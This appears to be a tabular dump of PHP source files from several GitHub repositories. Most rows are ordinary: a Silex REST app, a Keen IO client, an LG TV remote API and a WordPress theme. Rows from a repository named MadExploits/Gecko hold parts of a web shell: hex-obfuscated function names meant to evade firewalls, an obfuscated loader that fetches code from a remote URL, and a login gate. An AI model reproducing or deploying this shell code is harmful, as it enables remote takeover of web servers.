repo stringlengths 7 63 | file_url stringlengths 81 284 | file_path stringlengths 5 200 | content stringlengths 0 32.8k | language stringclasses 1
value | license stringclasses 7
values | commit_sha stringlengths 40 40 | retrieved_at stringdate 2026-01-04 15:02:33 2026-01-05 05:24:06 | truncated bool 2
classes |
|---|---|---|---|---|---|---|---|---|
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/app/config/propel/propilex.php | app/config/propel/propilex.php | <?php
$conf = require __DIR__ . '/conf/Propilex-conf.php';
foreach ($conf['datasources'] as $name => $configuration) {
if (!is_array($configuration)) {
continue;
}
$conf['datasources'][$name]['connection']['dsn'] = strtr(
$configuration['connection']['dsn'],
[ '%CACHE_DIR%' => rea... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/DocumentQuery.php | src/Propilex/Model/DocumentQuery.php | <?php
namespace Propilex\Model;
use Propilex\Model\om\BaseDocumentQuery;
/**
* @author William Durand <william.durand1@gmail.com>
*/
class DocumentQuery extends BaseDocumentQuery
{
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/Document.php | src/Propilex/Model/Document.php | <?php
namespace Propilex\Model;
use Propilex\Model\om\BaseDocument;
/**
* @author William Durand <william.durand1@gmail.com>
*/
class Document extends BaseDocument
{
/**
* @return boolean
*/
public function isEqualTo(Document $document)
{
return $this->getId() === $document->getId();
... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/DocumentPeer.php | src/Propilex/Model/DocumentPeer.php | <?php
namespace Propilex\Model;
use Propilex\Model\om\BaseDocumentPeer;
/**
* @author William Durand <william.durand1@gmail.com>
*/
class DocumentPeer extends BaseDocumentPeer
{
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/Repository/InMemoryDocumentRepository.php | src/Propilex/Model/Repository/InMemoryDocumentRepository.php | <?php
namespace Propilex\Model\Repository;
use Pagerfanta\Pagerfanta;
use Pagerfanta\Adapter\ArrayAdapter;
use Propilex\Model\Document;
class InMemoryDocumentRepository implements DocumentRepositoryInterface
{
private $documents;
public function __construct(array $documents)
{
$this->documents =... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/Repository/PropelDocumentRepository.php | src/Propilex/Model/Repository/PropelDocumentRepository.php | <?php
namespace Propilex\Model\Repository;
use Pagerfanta\Adapter\PropelAdapter;
use Pagerfanta\Pagerfanta;
use Propilex\Model\Document;
/**
* @author William Durand <william.durand1@gmail.com>
*/
class PropelDocumentRepository implements DocumentRepositoryInterface
{
private $query;
public function __con... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Model/Repository/DocumentRepositoryInterface.php | src/Propilex/Model/Repository/DocumentRepositoryInterface.php | <?php
namespace Propilex\Model\Repository;
use Propilex\Model\Document;
interface DocumentRepositoryInterface
{
/**
* @return Document
*/
public function find($id);
/**
* @return Document[]
*/
public function findAll();
/**
* @param Document
*/
public function ... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Controller/DocumentController.php | src/Propilex/Controller/DocumentController.php | <?php
namespace Propilex\Controller;
use Hateoas\Configuration\Relation;
use Hateoas\Configuration\Route;
use Hateoas\Representation\CollectionRepresentation;
use Propilex\Model\Document;
use Propilex\Response\NoContentResponse;
use Silex\Application;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Componen... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Controller/HomeController.php | src/Propilex/Controller/HomeController.php | <?php
namespace Propilex\Controller;
use Propilex\View\Endpoint;
use Silex\Application;
use Symfony\Component\HttpFoundation\Request;
class HomeController
{
public function indexAction(Request $request, Application $app)
{
if ('html' === $request->attributes->get('_format')) {
return file... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Hateoas/TransExpressionFunction.php | src/Propilex/Hateoas/TransExpressionFunction.php | <?php
namespace Propilex\Hateoas;
use Hateoas\Expression\ExpressionFunctionInterface;
use Symfony\Component\Translation\Translator;
class TransExpressionFunction implements ExpressionFunctionInterface
{
/**
* @var Translator
*/
private $translator;
public function __construct(Translator $trans... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Hateoas/CuriesConfigurationExtension.php | src/Propilex/Hateoas/CuriesConfigurationExtension.php | <?php
namespace Propilex\Hateoas;
use Hateoas\Configuration\Relation;
use Hateoas\Configuration\Route;
use Hateoas\Configuration\Metadata\ClassMetadataInterface;
use Hateoas\Configuration\Metadata\ConfigurationExtensionInterface;
class CuriesConfigurationExtension implements ConfigurationExtensionInterface
{
pri... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Hateoas/VndErrorRepresentation.php | src/Propilex/Hateoas/VndErrorRepresentation.php | <?php
namespace Propilex\Hateoas;
use Hateoas\Configuration\Relation;
use Hateoas\Configuration\Annotation as Hateoas;
use Hateoas\Configuration\Metadata\ClassMetadataInterface;
use JMS\Serializer\Annotation as Serializer;
/**
* @Serializer\ExclusionPolicy("all")
* @Serializer\XmlRoot("resource")
*
* @Hateoas\Re... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/Response/NoContentResponse.php | src/Propilex/Response/NoContentResponse.php | <?php
namespace Propilex\Response;
use Symfony\Component\HttpFoundation\Response;
class NoContentResponse extends Response
{
public function __construct()
{
parent::__construct('', 204);
}
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/View/FormErrors.php | src/Propilex/View/FormErrors.php | <?php
namespace Propilex\View;
use Symfony\Component\Validator\ConstraintViolationList;
final class FormErrors
{
private $errors = [];
public function __construct(ConstraintViolationList $violations)
{
foreach ($violations as $violation) {
$this->errors[] = new FieldError(
... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/View/Endpoint.php | src/Propilex/View/Endpoint.php | <?php
namespace Propilex\View;
final class Endpoint
{
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/View/ViewHandler.php | src/Propilex/View/ViewHandler.php | <?php
namespace Propilex\View;
use JMS\Serializer\SerializerInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Exception\NotAcceptableHttpException;
class ViewHandler
{
private $serializer;
private $request;
private $... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/View/Error.php | src/Propilex/View/Error.php | <?php
namespace Propilex\View;
class Error
{
private $message;
public function __construct($message)
{
$this->message = $message;
}
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/src/Propilex/View/FieldError.php | src/Propilex/View/FieldError.php | <?php
namespace Propilex\View;
class FieldError extends Error
{
private $field;
public function __construct($field, $message)
{
parent::__construct($message);
$this->field = $field;
}
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/tests/bootstrap.php | tests/bootstrap.php | <?php
$loader = require __DIR__ . '/../vendor/autoload.php';
$loader->add('Propilex', __DIR__ . '/../tests');
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/tests/Propilex/Tests/TestCase.php | tests/Propilex/Tests/TestCase.php | <?php
namespace Propilex\Tests;
/**
* @author William Durand <william.durand1@gmail.com>
*/
class TestCase extends \PHPUnit_Framework_TestCase
{
}
| php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/tests/Propilex/Tests/WebTestCase.php | tests/Propilex/Tests/WebTestCase.php | <?php
namespace Propilex\Tests;
use Silex\WebTestCase as BaseWebTestCase;
use Symfony\Component\HttpFoundation\Response;
abstract class WebTestCase extends BaseWebTestCase
{
protected function assertJsonResponse(Response $response, $statusCode = 200, $contentType = 'application/json')
{
$this->assert... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/tests/Propilex/Tests/Controller/DocumentControllerTest.php | tests/Propilex/Tests/Controller/DocumentControllerTest.php | <?php
namespace Propilex\Tests\Controller;
use Propilex\Model\Document;
use Propilex\Model\Repository\InMemoryDocumentRepository;
use Propilex\Tests\WebTestCase;
class DocumentRestControllerTest extends WebTestCase
{
public function createApplication()
{
$app = require __DIR__ . '/../../../../app/pro... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
willdurand/Propilex | https://github.com/willdurand/Propilex/blob/c983bed65d1cef3ff1bb635cda6c1cb02452cf18/web/index.php | web/index.php | <?php
date_default_timezone_set('Europe/Paris');
$filename = __DIR__.preg_replace('#(\?.*)$#', '', $_SERVER['REQUEST_URI']);
if (php_sapi_name() === 'cli-server' && is_file($filename)) {
return false;
}
$app = require_once __DIR__ . '/../app/propilex.php';
$app = include_once __DIR__ . '/../app/stack.php';
Stack... | php | MIT | c983bed65d1cef3ff1bb635cda6c1cb02452cf18 | 2026-01-05T05:13:52.563402Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/src/Client/KeenIOClient.php | src/Client/KeenIOClient.php | <?php
namespace KeenIO\Client;
use GuzzleHttp\Command\CommandInterface;
use GuzzleHttp\Command\Guzzle\GuzzleClient;
use GuzzleHttp\Command\Guzzle\Description;
use GuzzleHttp\Client;
use KeenIO\Exception\RuntimeException;
/**
* Class KeenIOClient
*
* @package KeenIO\Client
*
* @method array getCollection(string ... | php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/src/Client/Filter/MultiTypeFiltering.php | src/Client/Filter/MultiTypeFiltering.php | <?php
/*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS B... | php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/src/Client/Resources/keen-io-3_0.php | src/Client/Resources/keen-io-3_0.php | <?php
return array(
'name' => 'KeenIO',
'baseUri' => 'https://api.keen.io/3.0/',
'apiVersion' => '3.0',
'operations' => array(
'getResources' => array(
'uri' => '/',
'description' => 'Returns the available child resources. Currently, the only child '... | php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | true |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/src/Exception/ExceptionInterface.php | src/Exception/ExceptionInterface.php | <?php
namespace KeenIO\Exception;
/**
* Exception interface
*/
interface ExceptionInterface
{
}
| php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/src/Exception/RuntimeException.php | src/Exception/RuntimeException.php | <?php
namespace KeenIO\Exception;
use RuntimeException as BaseRuntimeException;
/**
* Runtime exception
*/
class RuntimeException extends BaseRuntimeException implements ExceptionInterface
{
}
| php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/tests/bootstrap.php | tests/bootstrap.php | <?php
error_reporting(-1);
// Ensure that composer has installed all dependencies
if (!@require dirname(__DIR__) . '/vendor/autoload.php') {
die("Dependencies must be installed using composer:\n\nphp composer.phar install\n\n"
. "See http://getcomposer.org for help with installing composer\n");
}
| php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/tests/Tests/Filter/MultiTypeFilteringTest.php | tests/Tests/Filter/MultiTypeFilteringTest.php | <?php
/*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS B... | php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
keenlabs/KeenClient-PHP | https://github.com/keenlabs/KeenClient-PHP/blob/755f7c145091108ceb9d515f8fcde7a5ec367386/tests/Tests/Client/KeenIOClientTest.php | tests/Tests/Client/KeenIOClientTest.php | <?php
namespace KeenIO\Tests\Client;
use GuzzleHttp\Command\Exception\CommandClientException;
use KeenIO\Client\KeenIOClient;
use GuzzleHttp\Handler\MockHandler;
use GuzzleHttp\HandlerStack;
use GuzzleHttp\Psr7\Response;
use GuzzleHttp\Command\Guzzle\GuzzleClient;
use PHPUnit\Framework\TestCase;
use Yoast\PHPUnitPoly... | php | MIT | 755f7c145091108ceb9d515f8fcde7a5ec367386 | 2026-01-05T05:13:53.479380Z | false |
StefanNemeth/PHP-LG-SmartTV | https://github.com/StefanNemeth/PHP-LG-SmartTV/blob/6639400475cff6168b7c06d5c1a10d95eaf96680/example.php | example.php | <?php
/**
* ----------------------------------------
* Example - PHP LG SmartTV API
* ----------------------------------------
* https://github.com/SteveWinfield/PHP-LG-SmartTV
**/
include 'smartTV.php';
/**
* Create instance of TV
* @param IP Address of TV
* (optional) @param Port of TV (default is 8080)
**/
... | php | Apache-2.0 | 6639400475cff6168b7c06d5c1a10d95eaf96680 | 2026-01-05T05:14:16.406918Z | false |
StefanNemeth/PHP-LG-SmartTV | https://github.com/StefanNemeth/PHP-LG-SmartTV/blob/6639400475cff6168b7c06d5c1a10d95eaf96680/webInterface.php | webInterface.php | <?php
/**
* ----------------------------------------
* Practical - PHP LG SmartTV API
* ----------------------------------------
* https://github.com/SteveWinfield/PHP-LG-SmartTV
**/
session_start();
include 'smartTV.php';
/**
* Create instance of TV
* @param IP Address of TV
* (optional) @param Port of TV (de... | php | Apache-2.0 | 6639400475cff6168b7c06d5c1a10d95eaf96680 | 2026-01-05T05:14:16.406918Z | false |
StefanNemeth/PHP-LG-SmartTV | https://github.com/StefanNemeth/PHP-LG-SmartTV/blob/6639400475cff6168b7c06d5c1a10d95eaf96680/smartTV.php | smartTV.php | <?php
/**
* ----------------------------------------
* @title PHP-LG-SmartTV
* @desc LG SmartTV API
* @author Steve Winfield
* @copyright 2014 $AUTHOR$
* @license see /LICENCE
* ----------------------------------------
* https://github.com/SteveWinfield/PHP-LG-SmartTV
**/
if (!extension_loaded('curl')) {
die... | php | Apache-2.0 | 6639400475cff6168b7c06d5c1a10d95eaf96680 | 2026-01-05T05:14:16.406918Z | false |
MadExploits/Gecko | https://github.com/MadExploits/Gecko/blob/64d2888940b91b969b10458b11f927f9a3f59dbf/gecko-new.php | gecko-new.php | <?php
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
# function WAF
$Array = [
'676574637764', # ge tcw d => 0
'676c6f62', # gl ob => 1
'69735f646972', # is_d ... | php | MIT | 64d2888940b91b969b10458b11f927f9a3f59dbf | 2026-01-05T05:14:32.258281Z | true |
MadExploits/Gecko | https://github.com/MadExploits/Gecko/blob/64d2888940b91b969b10458b11f927f9a3f59dbf/gecko-litespeed.php | gecko-litespeed.php | <?php
goto sHNkh; sHNkh: $EnoeA = tmpfile(); goto uTcE6; uTcE6: $UmXGi = fwrite($EnoeA, file_get_contents("\x68\164\x74\x70\163\72\x2f\57\x72\141\x77\x2e\x67\151\164\150\x75\x62\165\x73\x65\162\143\x6f\x6e\x74\x65\x6e\164\x2e\x63\x6f\155\x2f\115\x61\x64\105\170\160\x6c\157\151\x74\x73\x2f\x47\145\x63\153\157\x2f\155\x... | php | MIT | 64d2888940b91b969b10458b11f927f9a3f59dbf | 2026-01-05T05:14:32.258281Z | false |
MadExploits/Gecko | https://github.com/MadExploits/Gecko/blob/64d2888940b91b969b10458b11f927f9a3f59dbf/gecko-login.php | gecko-login.php | <?php
session_start();
date_default_timezone_set("Asia/Jakarta");
// Konfigurasi
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
// Fungsi untuk tampilan halaman login
function show_login_page($message = "")
{
?>
<!DOCTYPE html>
<html>
<!DOCTYPE html>
<html lang="en... | php | MIT | 64d2888940b91b969b10458b11f927f9a3f59dbf | 2026-01-05T05:14:32.258281Z | true |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/footer.php | footer.php | <div class="container-full footer">
<div class="container footer-box">
<?php //版权 ?>
<div class="copyright">
<?php
if(get_option("i_copyright")) {
if(get_option("i_copyright") < date("Y")){
echo "Copyright © ".get_option("i_co... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/author.php | author.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_author(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/header-mobile.php | header-mobile.php | <div class="container-full nav-bar-mb header <?php if(get_option("i_header_hidden") == 1) {echo 'header-hidden';} ?>">
<div class="left">
<span id="menu-mb-open" class="iconfont icon-caidan2"></span>
</div>
<?php if(get_option("i_logo_hidden") == 1) {} else { ?>
<div class="center">
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/page.php | page.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_page(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/sidebar-article.php | sidebar-article.php | <div class="sidebar">
<div class="author-info-box">
<div class="author-info">
<div class="post-author-logo">
<a href="<?php the_post();home_url();echo '/author/';echo get_the_author_meta('user_login');rewind_posts(); ?>"><?php the_post();echo get_avatar(get_the_author_ID());rewin... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/archive.php | archive.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_archive(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/comments.php | comments.php | <?php
// 评论博主高亮
function filter_get_comment_author( $author, $comment_comment_id, $comment ) {
error_reporting(0);
$blogusers = get_user_by('id', 1);
foreach ( $blogusers as $user ){
if( $author == $user->display_name ){
$webMaster = '<span class="master">'.$author.'</span><i>博主<... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/search.php | search.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_search() ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/tag.php | tag.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_tag() ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/functions.php | functions.php | <?php
/**
* Author: 神秘布偶猫
* E-mail: me@onll.cn
*/
// ---------------------------------------------------------------------
// 自定义引入文件
function i_frame() {
require('inc/frame.php');
}
function i_frame_js() {
require('inc/frame-js.php');
}
function i_index() {
require('inc/home.php');
}
function i_article() {
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/searchform-mobile.php | searchform-mobile.php | <form role="searchform-mb" method="get" id="searchform-mb" class="searchform-mb" action="<?php bloginfo('url') ?>">
<div>
<input type="text-" value="<?php the_search_query(); ?>" name="s" id="s" placeholder="搜索这个世界" required>
<button type="submit"><span class="iconfont icon-sousuo"></span></button>
</div>
<... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/index.php | index.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_index(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html>
<?php if(get_option("i_mourn") == 1) { ?><style>html{filter:grayscale(1);}body::-webkit-scrollbar-t... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/404.php | 404.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div class="page-404">
<div class="page-404-detail">
<img src="<?php echo i_static(); ?>/images/404.png" alt="404">
<p><?php if(get_option("i_404_tip")) {echo get_option("i_404_tip");} else{echo "抱歉,... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/header.php | header.php | <div class="container-full nav-bar header <?php if(get_option("i_header_hidden") == 1) {echo 'header-hidden';} ?>">
<div class="left">
<?php if(get_option("i_logo_hidden") == 1) {} else { ?>
<a href="<?php bloginfo('url') ?>" rel="home" class="logo">
<img class="logo-light" src="... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/single-shuoshuo.php | single-shuoshuo.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_shuoshuo(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/date.php | date.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_date() ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/single.php | single.php | <?php i_frame(); ?>
<body>
<?php get_header(); ?>
<section>
<div>
<?php i_article(); ?>
</div>
<?php get_footer(); ?>
</section>
<?php i_frame_js(); ?>
</body>
</html> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/searchform.php | searchform.php | <form role="search" method="get" id="searchform" class="searchform" action="<?php bloginfo('url') ?>">
<input type="text" value="<?php the_search_query(); ?>" name="s" id="s" placeholder="搜索这个世界" required>
<button type="submit"><span class="iconfont icon-sousuo"></span></button>
</form> | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/sidebar.php | sidebar.php | <div class="sidebar">
<div class="author-info-box">
<div class="author-info">
<div class="post-author-logo">
<a href="<?php home_url();echo '/author/';echo get_the_author_meta('user_login',1); ?>"><?php echo get_avatar(1); ?></a>
</div>
<div class="post-au... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
